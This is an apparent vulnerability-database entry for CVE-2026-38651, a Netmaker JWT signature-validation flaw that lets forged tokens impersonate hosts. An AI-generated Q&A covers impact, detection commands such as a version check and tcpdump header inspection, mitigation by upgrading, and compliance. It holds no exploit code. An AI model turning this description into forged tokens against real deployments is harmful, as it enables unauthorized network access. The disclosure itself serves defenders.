CVE-2026-38651
Authentication Bypass in Netmaker JWT Allows Host Impersonation
Publication date: 2026-04-28
Last updated on: 2026-04-28
Assigner: MITRE
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| netmaker | netmaker | to 1.5.0 (exc) |
| gravitl | netmaker | to 1.5.0 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-347 | The product does not verify, or incorrectly verifies, the cryptographic signature for data. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-38651 is an Authentication Bypass vulnerability in Netmaker versions prior to 1.5.0. The issue lies in the VerifyHostToken function in logic/jwts.go, which fails to properly validate the JWT signature when verifying host tokens.
Because of this flaw, an attacker can forge a JWT signed with any arbitrary key and use it to impersonate any host in the network.
This allows the attacker to gain unauthorized access to sensitive information by pretending to be a legitimate host.
How can this vulnerability impact me? :
This vulnerability allows an attacker to bypass authentication by forging JWT tokens, enabling them to impersonate any host within the Netmaker network.
As a result, the attacker can gain unauthorized access to sensitive information and potentially manipulate network operations or data.
This compromises the confidentiality and integrity of the network and its data.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability involves improper validation of JWT host tokens in Netmaker versions prior to 1.5.0, allowing forged tokens to impersonate hosts.
To detect this vulnerability on your system, you can check the version of Netmaker running and verify if it is prior to 1.5.0.
Additionally, you can monitor API requests to Netmaker endpoints that require host token authorization and inspect the Authorization headers for malformed or suspicious JWT tokens.
Suggested commands include:
- Check Netmaker version: `netmaker --version` or inspect the deployed container/image version.
- Capture network traffic to Netmaker API endpoints and filter for Authorization headers: `tcpdump -i <interface> -A port <netmaker_api_port> | grep Authorization`
- Use JWT decoding tools (e.g., `jwt-cli` or online decoders) to inspect tokens for validity and signature verification failures.
If you find tokens signed with arbitrary keys or tokens accepted without proper validation, your system is likely vulnerable.
What immediate steps should I take to mitigate this vulnerability?
The primary mitigation is to upgrade Netmaker to version 1.5.0 or later, where the vulnerability has been fixed by improving JWT host token validation.
If immediate upgrade is not possible, consider restricting network access to the Netmaker API endpoints to trusted hosts only, reducing exposure to attackers.
Review and monitor API logs for suspicious authorization attempts using forged tokens.
Apply strict network segmentation and firewall rules to limit access to the Netmaker service.
Plan and test the deployment of the updated authorization middleware that enforces strict host token validation as described in the fix.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The vulnerability allows an attacker to impersonate any host in the network by forging JWT tokens, thereby gaining unauthorized access to sensitive information.
Such unauthorized access to sensitive data could lead to non-compliance with data protection regulations like GDPR and HIPAA, which require strict access controls and protection of personal and sensitive information.
By exploiting this vulnerability, an attacker could bypass authentication mechanisms, potentially exposing confidential data and violating regulatory requirements for data security and privacy.